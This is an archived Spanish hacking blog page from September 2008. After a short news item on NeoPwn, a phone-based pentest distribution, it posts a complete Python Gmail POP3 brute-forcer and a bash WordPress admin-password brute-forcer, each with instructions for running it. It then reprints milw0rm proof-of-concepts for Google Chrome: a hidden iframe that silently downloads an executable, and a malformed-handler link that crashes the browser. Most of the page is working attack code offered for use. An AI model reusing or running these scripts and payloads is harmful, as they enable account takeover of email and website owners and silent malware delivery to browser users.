Archivado en Septiembre, 2008

NeoPwn – El Backtrack para Celulares

Publicado por zerialkiller en Noticias con 1 Comentario

Dandome el rol por dragonjar me encontre este interesane artiiculo que nos habla sobre NeoPwn que es una muy buena combinación de Open Hardware con una gran cantidad herramientas para realizar pruebas de penetración y auditorías, todo esto desde un teléfono móvil.

Utiliza como base una distribución Debian (con kernel 2.6.24) totalmente personalizada y optimizada que arranca desde una tarjeta microSD sobre el teléfono OpenMoko (un teléfono de hardware abierto), cuenta con red inalámbrica, puertos USB (que le permite ampliar sus funcionalidades), GPS, moden GPRS para conexión celular, Bluetooth.

Para leer la nota completa click —> hay —-> DragonJar

Gmail bruteforce

Publicado por zerialkiller en brute force con 1 Comentario

Aqui les paso el codio en python para hacer brute force a gmail, solo necesitas hacer dos documentos uno es un archivo con el usuario que quieres atacar y el otro es el archivo del passlist.

#!usr/bin/python
#Gmail Pop3 Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import threading, time, random, sys, poplib
from copy import copy

if len(sys.argv) !=3:
print “\n\t   d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0″
print “\t   ————————————————–\n”
print “\t    Usage: ./gmailpopbrute.py <userlist> <wordlist>\n”
sys.exit(1)

server = “pop.gmail.com”
success = []

try:
users = open(sys.argv[1], “r”).readlines()
except(IOError):
print “[-] Error: Check your userlist path\n”
sys.exit(1)

try:
words = open(sys.argv[2], “r”).readlines()
except(IOError):
print “[-] Error: Check your wordlist path\n”
sys.exit(1)

try:
pop = poplib.POP3_SSL(server, 995)
welcome = pop.getwelcome()
pop.quit()
except (poplib.error_proto):
welcome = “No Response”
pass

print “\n\t   d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0″
print “\t   ————————————————–\n”
print “[+] Server:”,server
print “[+] Port: 995″
print “[+] Users Loaded:”,len(users)
print “[+] Words Loaded:”,len(words)
print “[+] Server response:”,welcome,”\n”

wordlist = copy(words)

def reloader():
for word in wordlist:
words.append(word)

def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words,  1)
words.remove(value[0])

else:
print “[-] Reloading Wordlist – Changing User\n”
reloader()
value = random.sample(words,  1)
users.remove(users[0])

lock.release()
if len(users) ==1:
return value[0], users[0]
else:
return value[0], users[0]

class Worker(threading.Thread):

def run(self):
value, user = getword()
user = user.replace(“\n”,”")
value = value.replace(“\n”,”")

try:
print “-”*12
print “[+] User:”,user,”Password:”,value
pop = poplib.POP3_SSL(server, 995)
pop.user(user)
pop.pass_(value)
print “\t\t\n\nLogin successful:”,user, value
print “\t\tMail:”,pop.stat()[0],”emails”
print “\t\tSize:”,pop.stat()[1],”bytes\n\n”
success.append(user)
success.append(value)
success.append(pop.stat()[0])
success.append(pop.stat()[1])
pop.quit()
except (poplib.error_proto), msg:
#print “An error occurred:”, msg
pass

for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
if len(success) >=1:
print “\n\n[+] Login successful:”,success[0], success[1]
print “\t[+] Mail:”,success[2],”emails”
print “\t[+] Size:”,success[3],”bytes\n”
print “\n[-] Done”

——————————————————————————————————————————————

Lo guardamos como gmailpopbrute.py y despues lo corremos.

#python gmailpopbrute.py user passlist

o bien.

#./gmailpopbrute.py user passlist

Saludos raza.

wp-bruteforcer

Publicado por zerialkiller en brute force con 3 Comentarios

Este es un pequeño script para hacerle fuerza bruta a paguinas que usen como motor word-press, lo unico que tenemos que hacer es guardarlo en un procesador de textos despues darle permisos y por ultimo ejecutarlo. Hay que tomar en cuenta que nos pide un diccionario de passwd, en donde guardemos el pequeño script guardamos tambien nuesto diccionario de passwrds pero con el siguiente nombre bf_passwords.

#!/usr/bin/env bash
# wordpress BruteForce v1.0
# coded By 0x90 2008
# 0x90[at]bsdmail.org
#    I do not take any reponsibilty for what you do with this tool
#    Hopefully it will make your life easier rather then making other
#    peoples lives more difficult!

echo ".::WordPress BruteForce By 0x90::."
echo "use a good dictioary rename it to bf_passwords"
echo
echo -n "Enter website with full path to wordpress:
> "
 read site

n=`cat bf_passwords | wc -l`
for (( i=1; i <= $n; i++));
do
#default user is admin
password=`sed -n "$i"p bf_passwords`
b=`echo "log=admin&pwd="$password"&wp-submit=Log+In&redirect_to=wp-admin" | lynx -dump -nolist -post_data ""$site"/wp-login.php" | grep -o "Howdy, admin"`

echo trying password $password

if [ ! -z "$b" ]; then

echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun ;) "
exit 0
fi
done
echo
echo "brute force complete"
echo "no luck, try better dictionary"
exit

Google chrome Vulnerabilidad

Publicado por zerialkiller en inseguridades con 0 comentarios

Visitando  http://www.milw0rm.com/ me di cuenta de la vulnerabilidad del nuevo navegador de google.

El fallo radica en la librería chrome.dll del navegador que permite bloquear todas las pestañas del Google Chrome mostrando el mensaje “!Vaya¡ Google Chrome ha fallado. ¿Deseas reiniciar?” con solo visitar un enlace en una pagina mal intencionada, pasando por alto la aclamada funcionalidad de “pestañas independientes” de este navegador.

Para ver el articulo completo de la descripcion del fallo ve a:
http://www.dragonjar.org/

***************************************************************************
 Author: nerex
 E-mail: nerex[at]live[dot]com

 Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
 downloaded to the user's computer without any user prompt.

 This proof-of-concept was created for educational purposes only.
 Use the code it at your own risk.
 The author will not be responsible for any damages.

 Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
**************************************************************************
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0"
 height="0">');
</script>

# milw0rm.com [2008-09-03]

______________________________________________________________________________________

---------------------------------------------------
Software:
Google Chrome Browser 0.2.149.27

Tested:
Windows XP Professional SP3

Result:
Google Chrome Crashes with All Tabs

Problem:
An issue exists in how chrome behaves with undefined-handlers in chrome.dll version
0.2.149.27. A crash can result without user interaction. When a user is made to visit
a malicious link, which has an undefined handler followed by a 'special' character,
the chrome crashes with a Google Chrome message window "Whoa! Google Chrome has crashed.
Restart now?". It lies in dealing with the POP EBP instruction when pointed out by the
EIP register at 0x01002FF4.

Proof of Concept:

http://evilfingers.com/advisory/google_chrome_poc.php

Credit:
Rishi Narang (psy.echo)
www.greyhat.in
www.evilfingers.com
---------------------------------------------------

PoC Working/Exploit:
Click for a demo &lt;a href="EVIL:%"&gt;HERE&lt;/a&gt;

# milw0rm.com [2008-09-03]